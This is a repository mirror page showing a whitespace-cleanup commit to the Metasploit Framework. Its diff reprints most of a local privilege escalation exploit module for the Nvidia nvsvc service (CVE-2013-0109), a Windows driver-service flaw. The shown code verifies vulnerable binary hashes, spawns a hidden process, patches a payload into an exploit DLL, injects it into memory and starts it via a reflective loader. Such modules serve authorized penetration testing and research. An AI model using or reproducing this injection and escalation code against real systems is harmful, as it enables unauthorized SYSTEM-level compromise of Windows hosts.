infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

msftidy 

Conflicts:
	lib/msf/core/post/windows/services.rb
bug/bundler_fix
Meatballs 2013-07-05 22:35:22 +01:00
parent 5eca4714c2
commit 819ba30a33
2 changed files with 53 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/core/post/windows/services.rb
View File

@ -292,7 +292,7 @@ module Services
# Now to grab a handle to the service. # Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it, # Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs. # and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000 # #define DELETE 0x00010000
handle = adv.OpenServiceA(manager, name, 0x10000) handle = adv.OpenServiceA(manager, name, 0x10000)
if (handle["return"] == 0) if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@ -312,7 +312,7 @@ module Services
# #
# @param (see #service_start) # @param (see #service_start)
# #
# @return {} representing lpServiceStatus # @return {} representing lpServiceStatus
# #
# @raise (see #service_start) # @raise (see #service_start)
# #

102
modules/exploits/windows/local/nvidia_nvsvc.rb
View File

@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super(update_info(info, { super(update_info(info, {
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{ 'Description' => %q{
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
interact with the service. The service has a stacked based buffer overflow as a result interact with the service. The service has a stacked based buffer overflow as a result
of a memmove operation. of a memmove operation.
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Peter Wintersmith', # Original exploit 'Peter Wintersmith', # Original exploit
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
], ],
'Arch' => ARCH_X86_64, 'Arch' => ARCH_X86_64,
'Platform' => 'win', 'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
}, },
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ] [ 'Automatic', { } ]
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 2048, 'Space' => 2048,
'DisableNops' => true 'DisableNops' => true
}, },
'References' => 'References' =>
[ [
[ 'CVE', '2013-0109' ], [ 'CVE', '2013-0109' ],
[ 'OSVDB', '88745' ], [ 'OSVDB', '88745' ],
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
rescue RuntimeError => e rescue RuntimeError => e
print_error("Unable to retrieve service status") print_error("Unable to retrieve service status")
end end
if sysinfo['Architecture'] =~ /WOW64/i if sysinfo['Architecture'] =~ /WOW64/i
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
else else
path = svc['Command'].strip path = svc['Command'].strip
end end
begin begin
hash = client.fs.file.md5(path).unpack('H*').first hash = client.fs.file.md5(path).unpack('H*').first
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
if vuln_hashes.include?(hash) if vuln_hashes.include?(hash)
vprint_good("Hash '#{hash}' is listed as vulnerable") vprint_good("Hash '#{hash}' is listed as vulnerable")
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
vprint_status("Hash '#{hash}' is not recorded as vulnerable") vprint_status("Hash '#{hash}' is not recorded as vulnerable")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
end end
@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
end end
end end
def create_proc def create_proc
windir = expand_path("%windir%") windir = expand_path("%windir%")
cmd = "#{windir}\\system32\\notepad.exe" cmd = "#{windir}\\system32\\notepad.exe"
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
end end
def is_running? def is_running?
begin begin
status = service_status('nvsvc') status = service_status('nvsvc')
return (status and status[:state] == 4) return (status and status[:state] == 4)
rescue RuntimeError => e rescue RuntimeError => e
print_error("Unable to retrieve service status") print_error("Unable to retrieve service status")
return false return false
end end
end end
@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
else else
print_good("Service is running") print_good("Service is running")
end end
dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
pay = payload.encoded dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
bo = dll.index('PAYLOAD:') pay = payload.encoded
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) bo = dll.index('PAYLOAD:')
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pe.exports.entries.each do |entry| pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
print_error("No offset found") unless offset pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
new_pid = create_proc print_error("No offset found") unless offset
if not new_pid new_pid = create_proc
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
end
vprint_status("Injecting payload into memory") if not new_pid
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) end
host_process.memory.protect(mem)
host_process.memory.write(mem, dll) vprint_status("Injecting payload into memory")
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
host_process.memory.protect(mem)
host_process.memory.write(mem, dll)
print_status("Executing exploit...") print_status("Executing exploit...")
host_process.thread.create(mem+offset) host_process.thread.create(mem+offset)
end end